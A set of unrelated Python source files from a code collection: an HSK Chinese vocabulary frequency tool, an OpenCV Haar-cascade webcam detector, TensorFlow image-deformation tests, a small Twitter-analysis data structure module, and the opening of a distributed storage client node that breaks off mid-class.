    results.append(blockboxtemplate().format("Non-HSK", "nonhskwordstolearn", wordstext))
def suggesthskchars(results, words, chars):
    """Append textareas of HSK characters (per level) absent from the
    input, plus up to 1000 frequent non-HSK characters not in the input.

    `words` is accepted for signature consistency with the other suggest_*
    actions but is not used here.
    """
    results.append("""<h3>Suggested HSK Characters not in Input</h3>""")
    for i in range(1, 7):
        charstolearn = u"\n".join(freqorder_char(hskchars[i] - chars))
        results.append(blockboxtemplate().format("HSK " + str(i), "hskcharstolearn" + str(i), charstolearn))
    # Highest-frequency characters neither in the input nor in any HSK list.
    foundchars = []
    for freq, char in char_freq_ordered:
        if char not in chars and char not in hskchars[16]:
            foundchars.append(char)
            if len(foundchars) >= 1000:
                break
    charstext = u"\n".join(freqorder_char(foundchars))
    # FIX: the textarea name previously appended the leaked loop variable
    # (always producing "...6"); use an explicit, stable field name.
    results.append(blockboxtemplate().format("Non-HSK", "nonhskcharstolearn", charstext))
def suggestfreqwords(results, words, chars):
    """Append a textarea of up to 1000 of the highest-frequency words that
    do not appear in the input words.  `chars` is unused (kept for
    signature consistency with the other suggest_* actions)."""
    results.append("""<h3>Suggested Words not in Input</h3>""")
    missing = []
    for _freq, candidate in word_freq_ordered:
        if candidate in words:
            continue
        missing.append(candidate)
        if len(missing) >= 1000:
            break
    results.append(textareatemplate.format("highfreqwords", u"\n".join(freqorder_word(missing))))
def suggestfreqwordsre(results, words, chars):
    """Append a textarea of up to 1000 high-frequency words that are not in
    the input words but can be written entirely with the input's
    characters."""
    results.append("""<h3>Suggested Words Using Characters in Input</h3>""")
    candidates = []
    for _freq, candidate in word_freq_ordered:
        if candidate in words:
            continue
        # Every character of the suggested word must already be known.
        if not all(ch in chars for ch in candidate):
            continue
        candidates.append(candidate)
        if len(candidates) >= 1000:
            break
    results.append(textareatemplate.format("highfreqwordsreuse", u"\n".join(freqorder_word(candidates))))
def suggestfreqchars(results, words, chars):
    """Append a textarea of up to 1000 of the highest-frequency characters
    absent from the input characters.  `words` is unused (kept for
    signature consistency with the other suggest_* actions)."""
    results.append("""<h3>Suggested Characters not in Input</h3>""")
    missing = []
    for _freq, candidate in char_freq_ordered:
        if candidate in chars:
            continue
        missing.append(candidate)
        if len(missing) >= 1000:
            break
    results.append(textareatemplate.format("highfreqchars", u"\n".join(freqorder_char(missing))))
init_done = False  # guard so the data files are parsed only once per process
# ================
# Initialise
def init_resources():
    """Load the HSK word lists (2012 revision and 2010 original) and the
    SUBTLEX-CH word/character frequency tables.

    Idempotent: subsequent calls return immediately.
    """
    # FIX: dropped the unused `zh_punctuation` from the global declaration
    # (it is never assigned in this function) and the stray semicolons.
    global init_done
    if init_done:
        return
    parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L1.txt", 1)
    parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L2.txt", 2)
    parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L3.txt", 3)
    parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L4.txt", 4)
    parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L5.txt", 5)
    parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L6.txt", 6)
    build_hsk_extralists(hskwords, hskchars)
    parse_hsk_2010_file("/home/hskhsk/data/New_HSK_2010.csv")
    build_hsk_extralists(hskwords2010, hskchars2010)
    parse_word_freq_file("/home/hskhsk/data/SUBTLEX-CH-WF.txt")
    parse_char_freq_file("/home/hskhsk/data/SUBTLEX-CH-CHR.txt")
    init_done = True
# ================
# Parse Hanzi input
def parseblock(hanzi, notes):
    """Parse free-running text by greedy longest-match word segmentation
    against the SUBTLEX word list (candidate windows of 1-5 characters).

    Returns (words, chars, hskwordcount, hskcharcount); the counts map HSK
    level (0 = non-HSK) to total occurrences, repeats included.  Each pair
    of overlapping segmentations is reported once via `notes`.
    """
    hskwordcount = {}
    hskcharcount = {}
    hskwordcount[0] = hskwordcount[1] = hskwordcount[2] = hskwordcount[3] = hskwordcount[4] = hskwordcount[5] = hskwordcount[6] = 0
    hskcharcount[0] = hskcharcount[1] = hskcharcount[2] = hskcharcount[3] = hskcharcount[4] = hskcharcount[5] = hskcharcount[6] = 0
    words = set()
    chars = set()
    overlaps = set()
    ignorechars = set()
    unknownchars = set()
    for chunk in hanzi.split():
        lastfoundend=-1
        lastfoundword = ""
        for i in range(len(chunk)+1):
            maxfound = 0
            foundword = ""
            # Longest dictionary word starting at i that extends past the
            # end of the previous match.
            for j in range(1, min(6, len(chunk)-i+1)):
                testword = chunk[i:i+j]
                if testword in word_freq and i+j>lastfoundend:
                    maxfound = j
                    foundword = testword
            if maxfound > 0:
                # A match that begins inside the previous match but ends
                # beyond it is an overlap; both words are kept.
                if lastfoundend > i and i+maxfound > lastfoundend and (lastfoundword, foundword) not in overlaps:
                    notes.append(u"Overlapping words, added both: {} and {}".format(lastfoundword, foundword))
                    overlaps.add( (lastfoundword,foundword) )
                if i+maxfound > lastfoundend:
                    lastfoundword = foundword
                    lastfoundend = i+maxfound
                words.add(foundword)
                hskwordcount[query_hsk_word_level(foundword)] += 1
        # Characters are tallied independently of the word segmentation.
        for char in chunk:
            if char_is_ok(char):
                chars.add(char)
                hskcharcount[query_hsk_char_level(char)] += 1
                if char not in char_freq:
                    unknownchars.add(char)
            else:
                ignorechars.add(char)
    if len(ignorechars):
        notes.append("Ignored characters: " + u", ".join(list(ignorechars)))
    if len(unknownchars):
        notes.append("Unknown characters: " + u", ".join(list(unknownchars)))
    return words, chars, hskwordcount, hskcharcount
def parselist(hanzi, notes):
    """Parse one-word-per-line input; anything after the first whitespace
    on a line is ignored (matches Skritter export format).

    Returns (words, chars, hskwordcount, hskcharcount); the counts map HSK
    level (0 = non-HSK) to total occurrences, repeats included.  Warnings
    about ignored/unknown items are appended to `notes`.
    """
    hskwordcount = {}
    hskcharcount = {}
    hskwordcount[0] = hskwordcount[1] = hskwordcount[2] = hskwordcount[3] = hskwordcount[4] = hskwordcount[5] = hskwordcount[6] = 0
    hskcharcount[0] = hskcharcount[1] = hskcharcount[2] = hskcharcount[3] = hskcharcount[4] = hskcharcount[5] = hskcharcount[6] = 0
    words = set()
    chars = set()
    ignorewords = set()
    ignorechars = set()
    unknownwords = set()
    unknownchars = set()
    for line in hanzi.split(u"\n"):
        chunks = line.split()
        if len(chunks):
            word = chunks[0]
            # Accept the word only if every character is a hanzi candidate.
            if len([c for c in word if not char_is_ok(c)]) == 0:
                words.add(word)
                hskwordcount[query_hsk_word_level(word)] += 1
                if word not in word_freq:
                    unknownwords.add(word)
            else:
                ignorewords.add(word)
            # Character tallies run for every word, accepted or not.
            for char in word:
                if char_is_ok(char):
                    chars.add(char)
                    hskcharcount[query_hsk_char_level(char)] += 1
                    if char not in char_freq:
                        unknownchars.add(char)
                else:
                    ignorechars.add(char)
    if len(ignorewords):
        notes.append("Ignored words: " + u", ".join(list(ignorewords)))
    if len(ignorechars):
        notes.append("Ignored characters: " + u", ".join(list(ignorechars)))
    if len(unknownwords):
        notes.append("Unknown words: " + u", ".join(list(unknownwords)))
    if len(unknownchars):
        notes.append("Unknown characters: " + u", ".join(list(unknownchars)))
    return words, chars, hskwordcount, hskcharcount
# ================
# Utilities for freq order
def freqorder_word(hanzi):
    """Return the given words sorted by descending SUBTLEX frequency,
    formatted according to the addfreqindex/addfreqvalue form options."""
    ranked = sorted(((query_word_freq(h), h) for h in hanzi), reverse=True)
    want_index = getform("addfreqindex")
    want_value = getform("addfreqvalue")
    if want_index and want_value:
        return [u"{}\t{}\t{}".format(h, query_word_freq_index(h), f) for f, h in ranked]
    if want_index:
        return [u"{}\t{}".format(h, query_word_freq_index(h)) for f, h in ranked]
    if want_value:
        return [u"{}\t{}".format(h, f) for f, h in ranked]
    return [h for f, h in ranked]
def freqorder_char(hanzi):
    """Return the given characters sorted by descending SUBTLEX frequency,
    formatted according to the addfreqindex/addfreqvalue form options."""
    ranked = sorted(((query_char_freq(h), h) for h in hanzi), reverse=True)
    want_index = getform("addfreqindex")
    want_value = getform("addfreqvalue")
    if want_index and want_value:
        return [u"{}\t{}\t{}".format(h, query_char_freq_index(h), f) for f, h in ranked]
    if want_index:
        return [u"{}\t{}".format(h, query_char_freq_index(h)) for f, h in ranked]
    if want_value:
        return [u"{}\t{}".format(h, f) for f, h in ranked]
    return [h for f, h in ranked]
def hanzideflink(hanzi):
    """Return an HTML anchor that looks the given hanzi up on MDBG."""
    # Python 2 urllib.quote; the hanzi must be UTF-8 encoded first.
    quoted = urllib.quote(hanzi.encode('utf-8'))
    target = u"http://www.mdbg.net/chindict/chindict.php?wdqb=" + quoted
    return u"""<a class="definition" href="{}">{}</a>""".format(target, hanzi)
def freqorder_word_link(hanzi):
    """Return MDBG definition links for the words, most frequent first."""
    ranked = sorted(((query_word_freq(h), h) for h in hanzi), reverse=True)
    return [hanzideflink(h) for _f, h in ranked]
def freqorder_char_link(hanzi):
    """Return MDBG definition links for the characters, most frequent
    first."""
    ranked = sorted(((query_char_freq(h), h) for h in hanzi), reverse=True)
    return [hanzideflink(h) for _f, h in ranked]
def char_is_ok(char):
    """Return True if `char` should be treated as a hanzi candidate.

    ASCII and three Unicode punctuation ranges are filtered out: General
    Punctuation, CJK Symbols and Punctuation, and Halfwidth/Fullwidth
    Forms.
    """
    code = ord(char)
    if code < 128:
        return False  # ASCII
    if 0x2000 <= code <= 0x206F:
        return False  # General Punctuation
    if 0x3000 <= code <= 0x303F:
        return False  # CJK Symbols and Punctuation
    if 0xFF00 <= code <= 0xFFEF:
        return False  # Halfwidth and Fullwidth Forms
    return True
# ================
# HSK Parsing
hsk_word_level = {}  # word -> lowest HSK level containing it, e.g. {u"AB": 1}
hsk_char_level = {}  # character -> lowest HSK level whose words use it
hskwords = {}  # level (or range key such as 16 = levels 1-6) -> set of words
hskchars = {}  # level (or range key) -> set of characters
hskwords2010 = {}  # same layout, for the 2010 lists
hskchars2010 = {}


def query_hsk_word_level(somehanzi):
    """Return the HSK level of the word, or 0 if it is not an HSK word."""
    # FIX: replaced the manual membership-test-then-index pattern with
    # the idiomatic single-lookup dict.get.
    return hsk_word_level.get(somehanzi, 0)


def query_hsk_char_level(somehanzi):
    """Return the HSK level of the character, or 0 if it is not in HSK."""
    return hsk_char_level.get(somehanzi, 0)
# parse newer 2012 HSK format
def parse_hsk_file(infilename, hsklevel):
    """Load one 2012 HSK vocabulary file into hskwords[hsklevel].

    The file is UTF-8, tab-separated with at least 4 columns, the word in
    the first column.  Also records the lowest HSK level of every word and
    of every character in hsk_word_level / hsk_char_level.
    """
    hskwords[hsklevel] = set()
    infile = codecs.open(infilename, 'r', "utf-8")
    for line in infile:
        splitted = line.strip().split("\t")
        if len(splitted) >= 4:
            # Normalise and drop any BOM that survived the decode.
            word = unicodedata.normalize("NFKC", splitted[0].strip()).replace(u'\ufeff',"")
            if word != "":
                hskwords[hsklevel].add(word)
                if word in hsk_word_level:
                    hsk_word_level[word] = min(hsk_word_level[word], hsklevel)
                else:
                    hsk_word_level[word] = hsklevel
                for somehanzi in word:
                    if somehanzi in hsk_char_level:
                        hsk_char_level[somehanzi] = min(hsk_char_level[somehanzi], hsklevel)
                    else:
                        hsk_char_level[somehanzi] = hsklevel
    infile.close()
def build_hsk_extralists(words, chars):
    """Derive per-level character sets from the word lists and add
    level-range entries to both dicts.

    After this call chars[n] holds only the characters first introduced at
    level n (characters already present at a lower level are removed), and
    key lo*10 + hi (e.g. 16) holds the union of levels lo..hi for both
    words and chars.
    """
    # Raw character sets per level, straight from the words.
    raw = {}
    for level in range(1, 7):
        raw[level] = set()
        for word in words[level]:
            raw[level].update(word)
    # Keep only the characters not already seen at a lower level.
    chars[1] = raw[1]
    seen = set(raw[1])
    for level in range(2, 7):
        chars[level] = raw[level] - seen
        seen |= raw[level]
    # Range keys: entry lo*10 + hi is the union of levels lo..hi.
    for lo in range(1, 6):
        for hi in range(lo + 1, 7):
            combinedwords = set(words[lo])
            combinedchars = set(chars[lo])
            for level in range(lo + 1, hi + 1):
                combinedwords |= words[level]
                combinedchars |= chars[level]
            words[lo * 10 + hi] = combinedwords
            chars[lo * 10 + hi] = combinedchars
def parse_hsk_2010_file(infilename):
    """Load the 2010 HSK CSV (lines of "level,word,...") into hskwords2010.

    Unlike the 2012 parser, this does not populate any per-character level
    map; only the per-level word sets are filled.
    """
    infile = codecs.open(infilename, 'r', "utf-8")
    hskwords2010[1] = set()
    hskwords2010[2] = set()
    hskwords2010[3] = set()
    hskwords2010[4] = set()
    hskwords2010[5] = set()
    hskwords2010[6] = set()
    for line in infile:
        splitted = line.split(",")
        if len(splitted) > 1:
            # Strip any BOM before parsing the level number.
            hsklevel = int(splitted[0].strip().replace(u'\ufeff',""))
            word = unicodedata.normalize("NFKC", splitted[1].strip()).replace(u'\ufeff',"")
            if word != "":
                hskwords2010[hsklevel].add(word)
    infile.close()
# ================
# Frequency parsing
word_freq = {}  # word -> raw SUBTLEX-CH frequency count
char_freq = {}  # character -> raw SUBTLEX-CH frequency count
word_freq_index = {}  # word -> 1-based frequency rank (1 = most frequent)
char_freq_index = {}  # character -> 1-based frequency rank
word_freq_ordered = []  # [(freq, word), ...] sorted by descending frequency
char_freq_ordered = []  # [(freq, char), ...] sorted by descending frequency

# don't do anything fancy here, no point - want to show the actual freq

def query_word_freq(somehanzi):
    """Return the raw SUBTLEX frequency of the word, or 0 if unknown."""
    # FIX: membership-test-then-index replaced with idiomatic dict.get.
    return word_freq.get(somehanzi, 0)


def query_char_freq(char):
    """Return the raw SUBTLEX frequency of the character, or 0 if unknown."""
    return char_freq.get(char, 0)


def query_word_freq_index(word):
    """Return the 1-based frequency rank of the word, or 0 if unknown."""
    return word_freq_index.get(word, 0)


def query_char_freq_index(char):
    """Return the 1-based frequency rank of the character, or 0 if unknown."""
    return char_freq_index.get(char, 0)
# parse SUBTLEX word frequency
def parse_word_freq_file(infilename):
    """Load the SUBTLEX-CH word frequency table.

    Populates word_freq (word -> count), word_freq_index (word -> 1-based
    rank, in file order) and word_freq_ordered (descending-frequency
    list).  Expects UTF-8, tab-separated lines with exactly 7 fields.
    """
    infile = codecs.open(infilename, 'r', "utf-8")
    freq_index = 1
    for line in infile:
        splitted = line.strip().split("\t")
        if len(splitted) == 7:
            word = unicodedata.normalize("NFKC", splitted[0].strip()).replace(u'\ufeff',"")
            freq = int(splitted[1].strip())
            if word != "" and freq > 0:
                word_freq[word] = freq
                word_freq_index[word] = freq_index
                freq_index += 1
    # Python 2 iteritems().  Assumes a single call per process (guarded by
    # init_resources); a second call would duplicate the ordered entries.
    for word, freq in word_freq.iteritems():
        word_freq_ordered.append( (freq, word) )
    word_freq_ordered.sort()
    word_freq_ordered.reverse()
    infile.close()
# parse SUBTLEX char frequency
def parse_char_freq_file(infilename):
    """Load the SUBTLEX-CH character frequency table.

    Populates char_freq (char -> count), char_freq_index (char -> 1-based
    rank, in file order) and char_freq_ordered (descending-frequency
    list).  Expects UTF-8, tab-separated lines with exactly 7 fields.
    """
    infile = codecs.open(infilename, 'r', "utf-8")
    freq_index = 1
    for line in infile:
        splitted = line.strip().split("\t")
        if len(splitted) == 7:
            char = unicodedata.normalize("NFKC", splitted[0].strip()).replace(u'\ufeff',"")
            freq = int(splitted[1].strip())
            if char != "" and freq > 0:
                char_freq[char] = freq
                char_freq_index[char] = freq_index
                freq_index += 1
    # Python 2 iteritems(); single call per process assumed (see above).
    for char, freq in char_freq.iteritems():
        char_freq_ordered.append( (freq, char) )
    char_freq_ordered.sort()
    char_freq_ordered.reverse()
    infile.close()
| StarcoderdataPython |
1771605 | import cv2
from basecam import BaseCam
from util import apply_doc, get_cascade_file_path, is_escape, wait_frames
class HaarCam(BaseCam):
    """
    Webcam that performs Haar Cascade object detection on the video stream.
    """

    @apply_doc(BaseCam.__init__)
    def __init__(self, window):
        super(HaarCam, self).__init__(window)
        # One classifier per supported anatomical region, loaded from the
        # bundled cascade XML files via _init_classifier.
        self._face_classifier = self._init_classifier("haarcascade_frontalface_default.xml")
        self._fullbody_classifier = self._init_classifier("haarcascade_fullbody.xml")
        self._lowerbody_classifier = self._init_classifier("haarcascade_lowerbody.xml")
        self._upperbody_classifier = self._init_classifier("haarcascade_upperbody.xml")

    def detect_parts(self, img, classifier):
        """
        Detect anatomical parts in ``img`` with Haar Cascade object detection.

        Draws a blue rectangle around each detection, mutating and
        returning ``img``.

        :param img: Image read from webcam.
        :param classifier: Classifier to detect anatomical parts.
        """
        # Haar cascades operate on grayscale input.
        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        # 1.3 = pyramid scale factor, 5 = minNeighbors (detections required
        # to accept a region).
        parts = classifier.detectMultiScale(gray, 1.3, 5)
        for x, y, w, h in parts:
            cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), thickness=2)
        return img

    @apply_doc(BaseCam.run)
    def run(self, frame_throttle, classifier=None):
        """
        :param classifier: Classifier to detect anatomical parts. Defaults \
        to a face classifier if ``None``.
        """
        if classifier is None:
            classifier = self.face_classifier
        try:
            for _ in wait_frames(throttle=frame_throttle):
                ret_val, img = self.cam.read()
                detected = self.detect_parts(img, classifier)
                cv2.imshow(self.window, detected)
                # esc to quit
                if is_escape(cv2.waitKey(1)):
                    break
        finally:
            # Always release the display window, even on error/interrupt.
            cv2.destroyWindow(self.window)

    @property
    def face_classifier(self):
        """
        Get a face classifier.
        """
        return self._face_classifier

    @property
    def fullbody_classifier(self):
        """
        Get a full body classifier.
        """
        return self._fullbody_classifier

    @property
    def lowerbody_classifier(self):
        """
        Get a lower body classifier.
        """
        return self._lowerbody_classifier

    @property
    def upperbody_classifier(self):
        """
        Get an upper body classifier.
        """
        return self._upperbody_classifier

    def _init_classifier(self, cascade_file):
        """
        Initialize a Haar Cascade Classifier.

        :param cascade_file: Name of cascade file in the ``xmls`` directory.
        """
        return cv2.CascadeClassifier(get_cascade_file_path(cascade_file))
def main():
    """Entry point: open a HaarCam window and run face detection at the
    default frame throttle."""
    cam = HaarCam("haarcam")
    cam.run(frame_throttle=10)


if __name__ == "__main__":
    main()
| StarcoderdataPython |
1715579 | # Lint as: python2, python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf
from multidim_image_augmentation import deformation_utils
_ARRAY_COMPARE_TOLERANCE = 1e-5
class ControlGridTest(tf.test.TestCase):
  """Shape checks for deformation_utils.create_control_grid_for_cubic_interp."""

  def test_create_control_grid_for_cubic_interp_2d(self):
    with self.session():
      grid = deformation_utils.create_control_grid_for_cubic_interp(
          transformed_image_shape=[20, 30],
          transformed_image_spacings_um=tf.constant([0.1, 0.1]),
          control_grid_spacings_pix=[9, 9])
      # 6x8 grid of 2-D control points for a 20x30 output at spacing 9.
      self.assertAllEqual([6, 8, 2], grid.eval().shape)

  def test_create_control_grid_for_cubic_interp_3d(self):
    with self.session():
      grid = deformation_utils.create_control_grid_for_cubic_interp(
          transformed_image_shape=[10, 20, 30],
          transformed_image_spacings_um=tf.constant([0.1, 0.1, 0.1]),
          control_grid_spacings_pix=[9, 9, 9])
      # 4x6x8 grid of 3-D control points.
      self.assertAllEqual([4, 6, 8, 3], grid.eval().shape)

  def test_create_control_grid_for_cubic_interp_3d_single_slice(self):
    with self.session():
      grid = deformation_utils.create_control_grid_for_cubic_interp(
          transformed_image_shape=[1, 20, 30],
          transformed_image_spacings_um=tf.constant([0.1, 0.1, 0.1]),
          control_grid_spacings_pix=[1, 9, 9])
      # A single-slice volume still gets 3 control planes along axis 0.
      self.assertAllEqual([3, 6, 8, 3], grid.eval().shape)
class Create2DDeformationFieldTest(tf.test.TestCase):
  def test_applies_cropping_offset(self):
    # Identity transform apart from a [row, col] crop offset of [2, 3]:
    # every output coordinate is shifted by exactly that amount.
    deformation_field = deformation_utils.create_2d_deformation_field(
        raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
        raw_image_element_size_um=tf.constant([1.0, 1.0]),
        net_input_spatial_shape=[3, 3],
        net_input_element_size_um=tf.constant([1.0, 1.0]),
        control_grid_spacings_pix=[2.0, 2.0],
        deformations_magnitudes_um=tf.constant([0.0, 0.0]),
        rotation_angle=tf.constant(0.0),
        scale_factors=tf.constant([1.0, 1.0]),
        mirror_factors=tf.constant([1, 1]),
        shearing_coefs=tf.constant([0.0, 0.0]),
        cropping_offset_pix=tf.constant([2.0, 3.0]))
    expected_output = np.array([[[2, 3], [2, 4], [2, 5]],
                                [[3, 3], [3, 4], [3, 5]],
                                [[4, 3], [4, 4], [4, 5]]])
    with self.session() as sess:
      np.testing.assert_allclose(
          expected_output,
          sess.run(deformation_field),
          atol=_ARRAY_COMPARE_TOLERANCE)
  def test_applies_rotation(self):
    # 45-degree (pi/4) rotation about the raw-image centre (1, 1); the
    # centre pixel maps to itself and the corners rotate around it.
    deformation_field = deformation_utils.create_2d_deformation_field(
        raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
        raw_image_element_size_um=tf.constant([1.0, 1.0]),
        net_input_spatial_shape=[3, 3],
        net_input_element_size_um=tf.constant([1.0, 1.0]),
        control_grid_spacings_pix=[2.0, 2.0],
        deformations_magnitudes_um=tf.constant([0.0, 0.0]),
        rotation_angle=tf.constant(np.pi / 4.),
        scale_factors=tf.constant([1.0, 1.0]),
        mirror_factors=tf.constant([1, 1]),
        shearing_coefs=tf.constant([0.0, 0.0]),
        cropping_offset_pix=tf.constant([0.0, 0.0]))
    expected_output = np.array([[[-0.4142135624, 1.],
                                 [0.2928932188, 1.7071067812],
                                 [1., 2.4142135624]],
                                [[0.2928932188, 0.2928932188],
                                 [1., 1.],
                                 [1.7071067812, 1.7071067812]],
                                [[1., -0.4142135624],
                                 [1.7071067812, 0.2928932188],
                                 [2.4142135624, 1]]])
    with self.session() as sess:
      np.testing.assert_allclose(
          expected_output,
          sess.run(deformation_field),
          atol=_ARRAY_COMPARE_TOLERANCE)
  def test_applies_shear(self):
    # Shear with coefficient 0.1 on the second axis: the column coordinate
    # contributes 0.1 per step to the row coordinate.
    deformation_field = deformation_utils.create_2d_deformation_field(
        raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
        raw_image_element_size_um=tf.constant([1.0, 1.0]),
        net_input_spatial_shape=[3, 3],
        net_input_element_size_um=tf.constant([1.0, 1.0]),
        control_grid_spacings_pix=[2.0, 2.0],
        deformations_magnitudes_um=tf.constant([0.0, 0.0]),
        rotation_angle=tf.constant(0.0),
        scale_factors=tf.constant([1.0, 1.0]),
        mirror_factors=tf.constant([1, 1]),
        shearing_coefs=tf.constant([0.0, 0.1]),
        cropping_offset_pix=tf.constant([0.0, 0.0]))
    expected_output = np.array([[[-0.1, 0], [0, 1], [0.1, 2]],
                                [[0.9, 0], [1, 1], [1.1, 2]],
                                [[1.9, 0], [2, 1], [2.1, 2]]])
    with self.session() as sess:
      np.testing.assert_allclose(
          expected_output,
          sess.run(deformation_field),
          atol=_ARRAY_COMPARE_TOLERANCE)
  def test_applies_mirror(self):
    """A mirror factor of -1 on the first axis flips the sampling grid's
    first coordinate about the image centre."""
    deformation_field = deformation_utils.create_2d_deformation_field(
        raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
        raw_image_element_size_um=tf.constant([1.0, 1.0]),
        net_input_spatial_shape=[3, 3],
        net_input_element_size_um=tf.constant([1.0, 1.0]),
        control_grid_spacings_pix=[2.0, 2.0],
        deformations_magnitudes_um=tf.constant([0.0, 0.0]),
        rotation_angle=tf.constant(0.0),
        scale_factors=tf.constant([1.0, 1.0]),
        mirror_factors=tf.constant([-1, 1]),
        shearing_coefs=tf.constant([0.0, 0.0]),
        cropping_offset_pix=tf.constant([0.0, 0.0]))
    # Rows appear in reversed order along the mirrored (first) axis.
    expected_output = np.array([[[2., 0.], [2., 1.], [2., 2.]],
                                [[1., 0.], [1., 1.], [1., 2.]],
                                [[0., 0.], [0., 1.], [0., 2.]]])
    with self.session() as sess:
      np.testing.assert_allclose(
          expected_output,
          sess.run(deformation_field),
          atol=_ARRAY_COMPARE_TOLERANCE)
  def test_applies_scale(self):
    """A scale factor of 2 on the first axis doubles the grid spacing of
    the first coordinate around the image centre."""
    deformation_field = deformation_utils.create_2d_deformation_field(
        raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
        raw_image_element_size_um=tf.constant([1.0, 1.0]),
        net_input_spatial_shape=[3, 3],
        net_input_element_size_um=tf.constant([1.0, 1.0]),
        control_grid_spacings_pix=[2.0, 2.0],
        deformations_magnitudes_um=tf.constant([0.0, 0.0]),
        rotation_angle=tf.constant(0.0),
        scale_factors=tf.constant([2.0, 1.0]),
        mirror_factors=tf.constant([1, 1]),
        shearing_coefs=tf.constant([0.0, 0.0]),
        cropping_offset_pix=tf.constant([0.0, 0.0]))
    # First coordinate runs -1, 1, 3 (spacing 2) instead of 0, 1, 2.
    expected_output = np.array([[[-1., 0.], [-1., 1.], [-1., 2.]],
                                [[1., 0.], [1., 1.], [1., 2.]],
                                [[3., 0.], [3., 1.], [3., 2.]]])
    with self.session() as sess:
      np.testing.assert_allclose(
          expected_output,
          sess.run(deformation_field),
          atol=_ARRAY_COMPARE_TOLERANCE)
  def test_applies_multiple_transforms_together(self):
    """Rotation, scale, mirror, shear and cropping offset compose into a
    single sampling grid; expected values are hand-computed."""
    deformation_field = deformation_utils.create_2d_deformation_field(
        raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
        raw_image_element_size_um=tf.constant([1.0, 1.0]),
        net_input_spatial_shape=[3, 3],
        net_input_element_size_um=tf.constant([1.0, 1.0]),
        control_grid_spacings_pix=[2.0, 2.0],
        deformations_magnitudes_um=tf.constant([0.0, 0.0]),
        rotation_angle=tf.constant(np.pi / 2.),
        scale_factors=tf.constant([1.0, 2.0]),
        mirror_factors=tf.constant([1, -1]),
        shearing_coefs=tf.constant([0.1, 0.0]),
        cropping_offset_pix=tf.constant([3.0, 5.0]))
    expected_output = np.array([[[3., 3.9], [4., 4.], [5., 4.1]],
                                [[3., 5.9], [4., 6.], [5., 6.1]],
                                [[3., 7.9], [4., 8.], [5., 8.1]]])
    with self.session() as sess:
      np.testing.assert_allclose(
          expected_output,
          sess.run(deformation_field),
          atol=_ARRAY_COMPARE_TOLERANCE)
  def test_oddEvenErrorHandling(self):
    """Requesting an even output size from an odd input must fail with the
    documented InvalidArgumentError at evaluation time."""
    with tf.Session():
      deform = deformation_utils.create_2d_deformation_field(
          np.array([101, 101]) / 2,
          raw_image_element_size_um=tf.constant([1., 1.]),
          net_input_spatial_shape=[50, 101],  # 50 is even -> invalid
          net_input_element_size_um=tf.constant([2., 1.]),
          control_grid_spacings_pix=[10, 10],
          deformations_magnitudes_um=tf.constant((0., 0.)),
          rotation_angle=tf.constant(0.),
          scale_factors=tf.constant((1., 1.)),
          mirror_factors=tf.constant((1., 1.)),
          shearing_coefs=tf.constant((0., 0., 0., 0.)),
          cropping_offset_pix=tf.constant((0., 0.)))
      # Graph construction succeeds; the check fires on eval().
      with self.assertRaisesWithPredicateMatch(
          tf.errors.InvalidArgumentError,
          "factor must be odd as input and output size is even"):
        deform.eval()
if __name__ == "__main__":
  # Run every test case in this module.
  tf.test.main()
| StarcoderdataPython |
4814633 | <reponame>AdamSwenson/TwitterProject
"""
This contains various simple datastructures which the various tools use.
It does not contain ORM classes.
Created by adam on 11/6/16
"""
__author__ = 'adam'
from collections import namedtuple
# Flat record for a token found during analysis: (sentence_index, word_index)
# locate the token, text is the token itself, id is the tweet or user id and
# type is 'tweet' or 'user'.
Result = namedtuple('Result', ['sentence_index', 'word_index', 'text', 'id', 'type'])


def is_result(r):
    """Return True if *r* is a Result record, else False.

    Replaces the manual ``if isinstance(...): return True / return False``
    chain with a direct boolean return.
    """
    return isinstance(r, Result)
def make_tweet_result(sentenceIndex, wordIndex, text, tweetId):
    """Build a Result tagged as 'tweet'; returns None when text or tweetId
    is None (same implicit behavior as before, made explicit)."""
    if text is None or tweetId is None:
        return None
    return Result(sentenceIndex, wordIndex, text, tweetId, 'tweet')
def make_user_result(sentenceIndex, wordIndex, text, userId):
    """Build a Result tagged as 'user'; returns None when text is None."""
    if text is None:
        return None
    return Result(sentenceIndex, wordIndex, text, userId, 'user')
| StarcoderdataPython |
1786976 | <reponame>M4gicT0/Distribute<filename>slave/client_node.py<gh_stars>0
import sys
import json
import netifaces as ni
from node import Node
from lead import LeadNode
from rpc_server import Server
import time
from uuid import getnode as get_mac
class ClientNode:
    """Storage slave node.

    Registers itself with the lead node over JSON-RPC, keeps a table of
    neighbour nodes and serves file read/write requests via an RPC server.
    """

    def __init__(self, config, debug=False):
        self.debug = debug
        if debug:
            # In debug mode the lead node runs on this machine.
            config['lead_ip'] = 'localhost'
        self.leadNode = LeadNode(config['lead_ip'], config['lead_port'])
        self.port = config['port']
        self._version = config['version']
        self.storage_units = config['storage_units']
        self.neighbours = {}  # MAC address -> Node
        self.server = Server(self, hex(get_mac()), self.get_ip(), self.port)

    def start(self):
        """Start the RPC server and announce this node to the lead."""
        self.server.start()
        self.register()

    def add_neighbour(self, mac, ip, port, units):
        """Record a peer node, keyed by its MAC address."""
        self.neighbours[mac] = Node(ip, port, units)

    def read_file(self, filepath):
        """Return the raw bytes of *filepath*."""
        with open(filepath, "rb") as file:
            return file.read()  # TODO: Serialize before return

    def write_file(self, name, content):
